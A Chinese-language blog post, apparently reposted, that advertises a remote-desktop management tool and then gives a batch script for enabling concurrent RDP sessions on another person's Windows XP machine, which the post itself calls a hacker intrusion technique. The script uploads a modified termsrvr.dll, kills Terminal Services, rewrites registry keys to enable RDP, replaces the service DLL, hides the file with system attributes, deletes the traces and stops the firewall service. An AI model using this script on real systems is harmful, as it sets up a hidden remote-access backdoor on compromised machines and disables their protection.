标签:mina ghost 替换 文件上传 iis7 rms 管理 上传 内容
双开3389,也就是双开3389端口,一般是黑客入侵的手法。
一般服务器管理人员都没有双开的意义,开启服务器的方法有很多,但要批量打开特定分组的服务器,就需要用到辅助工具了。
IIS7远程桌面,是一款专业的服务器批量管理软件。能自定义分辨率和窗口大小,能同时打开N台服务器,能批量导出及导入服务器数据以及可以备份数据和导入历史数据等。
官网入口:IIS7远程桌面
那么,如果现在你还在追问怎么双开3389,以下便是操作手法(慎用)
XP系统中集成的“远程桌面”虽然功能强大,但限制也较多,如只支持单用户登录,用户登录后原用户必须注销。双开就是通过相关工具使远程登录同时在线用户为2个(也可多个)。
记得用过一款名为“第三区信息安全小组全自动3389双开”的工具,在“YlmF 8.0安装绝版”上可以实现双开,但在“YlmF ghost ntfs 7.0纯净”版上却没有成功,窗口方式与cmd方式下都不行,具体原因还没来得及找。而且该工具在cmd模式下运行时,会出现内存不足的提示,不能运行成功。
下面介绍另一种双开的方法:
1、将经过处理的termsrvr.dll文件上传到对方机器的某个根目录下,如c:\下;
2、执行tasklist /svc,查看终端服务Terminal Services的PID号,并将此PID号替换下面要执行的批处理文件中的*号;
3、执行如下内容的批处理
@echo off
@ntsd -c
q -p *
@shutdown -a
@REG ADD
HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v
KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD
HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t
REG_DWORD /d 00000000 /f
@REG ADD
HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v
EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD
HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t
REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvr.dll /f
@copy c:\termsrvr.dll
c:\windows\system32\termsrvr.dll
@Attrib +H +S +R
C:\windows\system32\termsrvr.dll
@del c:\termsrvr.dll
@net stop
sharedaccess
@net start termservice
@net start dcomlaunch
标签:mina ghost 替换 文件上传 iis7 rms 管理 上传 内容
原文地址:https://www.cnblogs.com/jy33/p/12191207.html
